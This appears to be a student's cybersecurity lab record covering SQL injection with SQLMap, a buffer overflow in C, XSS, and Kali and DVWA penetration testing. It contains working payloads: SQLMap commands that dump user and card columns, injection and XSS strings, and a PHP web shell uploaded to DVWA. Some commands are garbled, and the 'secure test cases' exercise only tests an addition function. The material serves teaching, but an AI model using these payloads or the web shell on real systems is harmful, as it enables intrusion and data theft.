Register

No:411622149007

TABLE OF CONTENTS
Exp.no Title of experiments Date Pg no Signature

1. Implement the SQL

injection attack
2. Implement the buffer
overflow
3. Implement cross site
scripting and prevent XSS
4. Perform Penetration testing
on a web application to
gather information about
the system ,then initiate XSS
and SQL injection attacks
using tools like kali linux
5. Develop and test the secure
test cases
6. Penetration test using Kali
linux
 Register
No:411622149007

Ex no:1
Implement the SQL injection attack
Date:

AIM:
To implement SQL injection testing in a Linux environment using SQLMap to identify
SQL vulnerabilities. This experiment helps understand SQL injection types and methods for
securing databases against them.

Requirements:
1. Linux Environment: Any Linux distribution (Ubuntu, Kali Linux, etc.).
2. SQLMap Tool: A penetration testing tool for automated detection and exploitation
of SQL injection vulnerabilities.

Procedure:
1. Setup a Testing Environment:Ensure you have a sample web application with a
database backend vulnerable to SQL injection.
2. Identify a Target URL: Identify a URL in the test web application where SQL input
parameters exist (e.g., `http://example.com/page?id=1`).
3. SQLMap Execution:Run SQLMap against the target URL. Use various SQLMap
options to analyze injection vulnerabilities.
4. Analyze Output:Review SQLMap’s findings to see where vulnerabilities might exist
and what type of SQL injection could be performed.
5. Apply Security Fixes: Implement defensive coding practices (e.g., parameterized
queries, stored procedures) based on the findings to secure the application .

Execution Commands:
1. Basic SQLMap Command:
bash
sqlmap -u "http://example.com/page?id=1"
( Specifies the target URL.)

2. Specify Parameters and Detection:

bash
sqlmap -u "http://example.com/page" --data="id=1”
(--data: Specifies POST data for testing parameters.)

3. Retrieve Database Names:

bash
sqlmap -u "http://example.com/page?id=1" --dbs
 Register
No:411622149007

(--dbs`: Lists available databases.)

4. Select a Database and Retrieve Tables:

bash
sqlmap -u "http://example.com/page?id=1" -D <database_name> --tables

( `-D`: Specifies a database.)

(`--tables`: Lists tables in the selected database.)

5. Retrieve Column Names:

bash
sqlmap -u "http://example.com/page?id=1" -D <database_name> -T <table_name> --
columns

( `-T`: Specifies a table.)

( `--columns`: Lists columns in the specified table.)

Output:
 Register
No:411622149007

1. Identify Input Fields: Start by locating the login form on a vulnerable website that asks for a
username and password. For this example, assume the login form does not properly sanitize
user inputs.
2. Inject SQL Syntax: Enter test' as the username and OR '1'='1 as the password. These inputs
are designed to manipulate the SQL query running on the server.
3 .SQL Query Manipulation: The input changes the query structure, potentially transforming it
Sql to access the database:
SELECT * FROM users WHERE username='test' AND password='' OR '1'='1';
Here, OR '1'='1 is always true, bypassing the password requirement.
Vulnweb.com(testing website)

Result:
Thus the SQL injection was successfully demonstrated using SQLMap, identifying
potential vulnerabilities in the web application
 Register
No:411622149007

Ex no:2
Implement the buffer overflow
Date:

AIM:
To demonstrate a buffer overflow vulnerability in a controlled Linux environment using
C programming, helping students understand the concept and how to mitigate it through
secure coding practices.

Algorithm :
1. Set up a Simple C Program:
o Write a C program that demonstrates a buffer overflow by not checking the
bounds of an input buffer.
o The program will intentionally allow buffer overflow to observe how it
works.
2. Compile the Program:
o Compile the program in a Linux environment without security protections to
see the effect of a buffer overflow.
3. Run the Program:
o Execute the program with input that exceeds the buffer size, causing a
buffer overflow.
4. Observe the Outcome:
o Note the program’s behavior and any unexpected outputs. Optionally, use
debugging tools to analyze memory changes.
5. Apply Mitigations:
o Recode the program to prevent buffer overflow by limiting input size or
using safer functions.
 Register
No:411622149007

Program :
Below is a simple C program that demonstrates a basic buffer overflow vulnerability.

#include <stdio.h>
#include <string.h>

void vulnerableFunction(char *input) {

char buffer[10]; // Define a small buffer (10 bytes)

// Copy the input to the buffer without bounds checking

strcpy(buffer, input);

printf("Buffer content: %s\n", buffer);

}

int main(int argc, char *argv[]) {

if (argc < 2) {
printf("Usage: %s <input>\n", argv[0]);
return 1;
}

vulnerableFunction(argv[1]); // Pass user input to vulnerable function

printf("Program executed.\n");
return 0;
}
 Register
No:411622149007

Commands
1. Compile the Program without Protections:
o To observe the effects of the buffer overflow, compile without stack
protections:
Bash:
gcc -fno-stack-protector -z execstack -o buffer_overflow_demo
buffer_overflow_demo.c
o -fno-stack-protector: Disables stack protection.
o -z execstack: Allows execution on the stack (for demonstration purposes).
2. Run the Program with Safe Input:
Bash:
./buffer_overflow_demo Hello
3. Run the Program with Overflow Input:
o Pass an input string longer than 10 characters to trigger the overflow.
Bash
./buffer_overflow_demo AAAAAAAAAAAAAAA

Output:
 Normal Input (e.g., Hello): The program will print the buffer content and exit normally.
 Overflow Input (e.g., AAAAAAAAAAAAAAA): The program may crash or exhibit unexpected
behavior due to the buffer overflow, potentially overwriting adjacent memory. In some
cases, this may also reveal the program’s vulnerability to attacks.

Mitigation
To prevent buffer overflows:
 Use safer functions like strncpy instead of strcpy, ensuring bounds checking.
 Enable stack protection during compilation:
bash
gcc -o buffer_overflow_demo buffer_overflow_demo.c

Result:
Thus the experiment demonstrates how a buffer overflow occurs in C and highlights the
 Register
No:411622149007

importance of secure coding practices. Implementing this vulnerability allows to apply mitigations

Exp No:3

Date: IMPLEMENT CROSS SITE SCRIPTING AND PREVENT XSS

was such as buffer bounds checking was successfully displayed.

Aim
To understand Cross-Site Scripting (XSS) and implement HTML code to demonstrate
XSS attacks and prevention measures.

Algorithm
1. Create an HTML form that allows user input.
2. Inject malicious script in the form input.
3. Display the output on the page to demonstrate vulnerability.
4. Implement preventive techniques like sanitizing input, encoding output, and
enforcing a Content Security Policy (CSP).

Program - Demonstration of XSS

<html>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Vulnerable XSS Demo</title>
</head>
<body>
<h2>Enter Your Name:</h2>
<form method="POST">
<input type="text" name="username" id="username">
<button type="submit">Submit</button>
</form>
 Register
No:411622149007

<p id="display"></p>
<script>
// Display the input value directly without sanitization
const urlParams = new URLSearchParams(window.location.search);
const username = urlParams.get('username');
if (username) {
document.getElementById("display").innerHTML = "Hello, " + username;
}
</script>
</body>
</html>

Prevention Code (XSS Prevention)

<html>
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'self';">
<title>Prevent XSS Demo</title>
</head>
<body>
<h2>Enter Your Name:</h2>
<form method="GET">
<input type="text" name="username" id="username">
<button type="submit">Submit</button>
</form>
<p id="display"></p>

<script>
function escapeHTML(input) {
const div = document.createElement('div');
div.appendChild(document.createTextNode(input));
return div.innerHTML;
 Register
No:411622149007

}
// Get and escape the username parameter
const urlParams = new URLSearchParams(window.location.search);
const username = urlParams.get('username');
if (username) {
document.getElementById("display").innerHTML = "Hello, "
+escapeHTML(username);
}
</script>
</body>
</html>

Output

Results
 Register
No:411622149007

Thus the Cross - Site Scripting was successfully executed and the output
was verified.

Ex no:4 Perform Penetration testing on a web application to

gather information about the system ,then initiate XSS
Date: and SQL injection attacks using tools like kali linux
AIM
The aim of this penetration testing exercise is to identify and exploit vulnerabilities in
a web application to assess its security posture. Specifically, the focus will be on detecting
and exploiting SQL Injection and Cross-Site Scripting (XSS) vulnerabilities using tools
available in Kali Linux.

Algorithm
1. Information Gathering

Objective: Collect detailed information about the target web application.

Steps:

1 .Use Nmap to scan for open ports and services.

2. Perform DNS enumeration with dnsenum or dnsrecon.

3. Identify web server and technologies using tools like WhatWeb.

2. Vulnerability Scanning

Objective: Identify potential vulnerabilities in the web application.

Steps:

1 . Run Nikto to scan for known vulnerabilities.

2. Use OWASP ZAP or Burp Suite for automated and manual vulnerability
scanning.

3. Exploitation

Objective: Exploit identified vulnerabilities to understand their impact.

Steps:
 Register
No:411622149007

1.SQL Injection:

a. Use sqlmap to detect and exploit SQL injection vulnerabilities.

b. Example command: sqlmap -u "http://example.com/vulnerable.php?

id=1" --dbs

2. XSS (Cross-Site Scripting):

a. Use XSSer to detect and exploit XSS vulnerabilities.

b. Example command: xsser --url "http://example.com/vulnerable.php"

--auto

4. Post-Exploitation

Objective: Assess the extent of the compromise and gather further information.

Steps:

1. Use Metasploit for privilege escalation.

2. Extract sensitive data to demonstrate the impact of the

vulnerabilities.

5. Reporting

Objective: Document findings and provide recommendations for remediation.

Steps:

1.Create a detailed report including all findings, exploitation steps, and

screenshots.

2.Provide actionable recommendations to fix the identified vulnerabilities

Program
SQLi:
import requests

def sql_injection_test(url, payload):

response = requests.get(url + payload)

if "error" in response.text:

print("Potential SQL Injection vulnerability found!")

else:
 Register
No:411622149007

print("No vulnerability detected.")

# Example usage

url = http://example.com/vulnerable.php?id=

payload = "' OR '1'='1"

sql_injection_test(url, payload)

XSS:
from selenium import webdriver

def xss_test(url, payload):

driver = webdriver.Firefox()

driver.get(url + payload)

if "alert" in driver.page_source:

print("Potential XSS vulnerability found!")

else:

print("No vulnerability detected.")

driver.quit()

# Example usage

url = "http://example.com/vulnerable.php?search="

payload = "<script>alert('XSS')</script>"

xss_test(url, payload)

COMMANDS

SQL Injection Commands

Using sqlmap

sqlmap is a powerful tool for automating the detection and exploitation of SQL injection
 Register
No:411622149007

vulnerabilities.

1. Basic SQL Injection Test:

sqlmap -u http://example.com/vulnerable.php?id=1

2. Enumerate Databases:

sqlmap -u "http://example.com/vulnerable.php?id=1" --dbs

Or sqlmap -u <URL> --dbs

3. Enumerate Tables:

sqlmap -u "http://example.com/vulnerable.php?id=1" -D database_name –tables

Or sqlmap -U <UR L> -- D – tables

4. Dump Data from a Table:

sqlmap -u "http://example.com/vulnerable.php?id=1" -D database_name -T

table_name –dump

or sqlmap -U <URL > -- D accurat - T.users -- Columns

sqlmap -U <URL > -- D accurat -T.users - C

uname,Phone,name,address,coat,cc,email,password -- dump

XSS Commands

Using XSSer

XSSer is a tool for automating the detection and exploitation of XSS vulnerabilities.

1. Basic XSS Test:

xsser --url "http://example.com/vulnerable.php?search=<script>alert('XSS')</script>"

2. Automated XSS Testing:

xsser --url "http://example.com/vulnerable.php" --auto

 Register
No:411622149007

Output
SQL Injection Program Output

Potential SQL Injection vulnerability found!

XSS Program Output

Potential XSS vulnerability found!

SQL Injection Commands Output

1. Basic SQL Injection Test:

Information about the SQL injection vulnerability, including the type of database
and potential payloads.

2. Enumerate Databases:

List of databases available on the target system.

3. Enumerate Tables:

List of tables within the specified database.

4. Dump Data from a Table:

Data from the specified table.

XSS Commands Output

1. Basic XSS Test:

Detection of XSS vulnerability with a confirmation message.

2. Automated XSS Testing:

Automated detection and exploitation of XSS vulnerabilities with detailed results.

Result:
 Register
No:411622149007

Thus penetration testing exercise aimed to identify and exploit SQL Injection and Cross-Site Scripting
(XSS) vulnerabilities in a web application using tools available in Kali Linux.
 Register
No:411622149007

Ex.No: 5
Date: Develop and Test the secure test cases

AIM:

To identify SQL injection vulnerabilities by testing input fields, verifying input sanitization, and
ensuring continuous protection through automated security tests.

Tools required to design the test cases:

 Manual Testing:

 Burp Suite: Intercept and modify requests.

 Postman: Send custom HTTP requests.

 Automated Scanning:

 OWASP ZAP: Open-source security scanner.

 SQLMap: Automated SQL injection detection.

 Acunetix/Netsparker: Commercial vulnerability scanners.

 Continuous Integration:

 GitHub Actions/Jenkins/GitLab CI: Automate security tests in CI/CD pipelines.

 Static Code Analysis:

 SonarQube/CodeQL: Identify SQL injection risks in source code.

 Testing Environments:

 DVWA/OWASP Juice Shop: Safe environments for testing vulnerabilities.

Algorithms:

1. Manual Testing Tools:

o Burp Suite: A comprehensive tool for intercepting and modifying requests, useful for
crafting SQL injection payloads.

o Postman: Useful for sending custom HTTP requests to test different payloads on
specific endpoints.

2. Automated Security Scanning Tools:

o OWASP ZAP (Zed Attack Proxy): An open-source security scanner that helps in
finding SQL injection vulnerabilities.

o SQLMap: An automated tool specifically for detecting and exploiting SQL injection
vulnerabilities. Best used in controlled environments.
 Register
No:411622149007

o Acunetix or Netsparker: Commercial web vulnerability scanners that can detect SQL
injection and other vulnerabilities.

3. Continuous Integration Tools:

o GitHub Actions, Jenkins, GitLab CI/CD: Automate the running of security tests as
part of the CI/CD pipeline, ensuring tests are consistently run on new code.

4. Static Code Analysis Tools:

o SonarQube, CodeQL: Analyze source code for potential security vulnerabilities,

including SQL injection risks, by identifying unsafe database queries.

5. Testing Environments:

o Damn Vulnerable Web Application (DVWA), OWASP Juice Shop, and PortSwigger
Web Security Academy Labs: These provide safe, controlled environments to
practice and refine SQL injection test cases.

Workflow:

Step 1: Define the add Function

 File: adder.py

 Purpose: A function that adds two numbers.

 Code:

python

Copy code

def add(a, b):

"""Returns the sum of a and b."""

return a + b

Step 2: Create Unit Tests for the add Function

 File: test_adder.py

 Purpose: Validate the functionality of add by testing it with positive, negative, and zero
values.

 Code:

python

Copy code

import unittest

from adder import add

 Register
No:411622149007

class TestAdder(unittest.TestCase):

def test_add_positive_numbers(self):

self.assertEqual(add(2, 3), 5)

def test_add_negative_numbers(self):

self.assertEqual(add(-1, -1), -2)

def test_add_zero(self):

self.assertEqual(add(0, 0), 0)

def test_add_positive_and_negative(self):

self.assertEqual(add(-1, 1), 0)

if __name__ == '__main__':

unittest.main()

Step 3: Configure GitHub Actions for CI/CD

File: .github/workflows/python-app.yml

Purpose: Automate the testing process with each code push to the repository.

Code:

name: Python application

on: [push]

jobs:

build:

runs-on: ubuntu-latest

steps:

- name: Checkout code

uses: actions/checkout@v2

- name: Set up Python

uses: actions/setup-python@v2

with:

python-version: '3.x'
 Register
No:411622149007

- name: Install dependencies

run: |

python -m pip install --upgrade pip

- name: Run tests

run: |

python -m unittest discover

GitHub Actions Workflow (python-app.yml)

 On Push: Each time code is pushed, GitHub Actions automatically triggers.

 Expected Output:

o A successful run displays a green checkmark in the GitHub Actions tab of the
repository.

o The output log in GitHub Actions should confirm that all tests ran and passed.

o If any test fails, GitHub Actions logs the failure and provides information for
debugging.

Output:
Running Tests Locally (test_adder.py)

 When test_adder.py is run, the expected output is:

plaintext

Copy code

....

----------------------------------------------------------------------

Ran 4 tests in 0.001s

Result:
Thus the python program for secure test cases was successfully executed and the output
was verified.
 Register
No:411622149007

Ex.No: 6
Date: Penetration Test using Kali Linux

Aim :
To perform Penetration Testing on a web application using Kali Linux
Setup the Environment :
Tools Needed:
 Kali Linux : install on a Virtual Machine
 DVWA(Damn Vulnerable Web App)
 Burp Suit

Install DVWA:
1.Download and Setup DVWA:
$ git clone https://github.com/digininja/DVWA.git
$ cd DVWA/config

$ cp config.inc.php.dist config.inc.php
 Register
No:411622149007

2. Start the Web Server and Database:

$ sudo service apache2 start

$ sudo service mysql start

Step 1: Information Gathering

 Identify Technologies:

$ whatweb http://192.168.177.160/dvwa/ (change your kali Ip address)

 Register
No:411622149007

Step 2: Scanning and Enumeration

$ sudo nmap –sS –sV 192.168.177.160

Step 3: Vulnerability Assessment

Setup:

1.Open Burp Suite:

 Start Burp Suite from your Kali Linux applications menu.

2.Configure Browser Proxy:

 Set your browser to use Burp Suite as a proxy.

 Open Firefox and go to Preferences > Network Settings > Settings.

 Select “Manual proxy configuration” and set HTTP Proxy to 127.0.0.1 and Port to
8080.

 Check the box “Use this proxy server for all protocols.”
 Register
No:411622149007

Using Burp Suite:

 Make sure the Intercept is turned on in Burp Suite.

 Click open Browser and Browse the target application (e.g.,

http://127.0.0.1/dvwa/).

 Burp Suite will capture and display the HTTP requests.

 Go to the Target tab in the burp suite.

 Register
No:411622149007

 Go to the Issues tab to see a list for vulnerabilities

Step 4: Exploitation
1.Exploiting SQL injection vulnerability found in the previous step

 Open Browser and Browse http://127.0.0.1/DVWA/vulnerabilities/sqli/

 Enter values(e.g., 1) in the input field and click Submit.

 Register
No:411622149007

 Perform an Union Based sqli Attack

1'or'1=1 union select first_name ,last_name FROM users #

 Register
No:411622149007

2.Exploiting XSS Vulnerabilities in DVWA

Open DVWA:

 Navigate to http://127.0.0.1/dvwa/ in your browser.

 Log in with default credentials(dvwa,p@ssw0rd).

Navigate to XSS:

 Go to the "Reflected XSS" section in DVWA.

Test for Vulnerability:

 In the input field, enter <script>alert('XSS')</script> and submit.

 If vulnerable, an alert box will appear.

 Register
No:411622149007

Step 5: Post exploitation

Maintaining Access
Creating a Backdoor in DVWA

1. Create a PHP Shell:

 Create a simple PHP backdoor file, shell.php, with the following content:

<?php

if(isset($_REQUEST['cmd'])) {

echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>';

?>

 Save the file as shell.php

2. Upload shell.php:

 In DVWA's File Upload section, upload shell.php.

 Note the path where shell.php is uploaded (e.g.,

http://127.0.0.1/dvwa/hackable/uploads/shell.php).
 Register
No:411622149007

3. Access the Backdoor:

 Open your browser and navigate to the uploaded file.

 Use the following URL format to execute commands:

http://127.0.0.1/DVWA/hackable/uploads/shell.php?cmd=ls

Step 6: Reporting
Penetration Testing Report
Introduction
The purpose of this penetration test was to identify vulnerabilities in the target
web application and assess their potential impact.
Methodology
 Register
No:411622149007

Tools used: Nmap, Burp Suite, SQLMap, Metasploit.

Steps: Information Gathering, Scanning, Vulnerability Assessment, Exploitation,
Post-Exploitation.
# Findings
1. SQL Injection:
- Vulnerability: SQL Injection found in the login form.
2. XSS:
- Vulnerability: Cross-Site Scripting in the comment section.
- Evidence: Injected `<script>alert('XSS')</script>` and observed an alert.
Impact Assessment
SQL Injection: Could lead to database compromise, leakage of sensitive
information.
XSS: Could result in session hijacking, phishing attacks.

Recommendations
Sanitize input fields to prevent SQL injection.
Implement proper output encoding to prevent XSS.

Result:
Thus the Penetrating Testing using Kali Linux was performed on DVWA
and The Vulnerabilities found are Reported Successfully.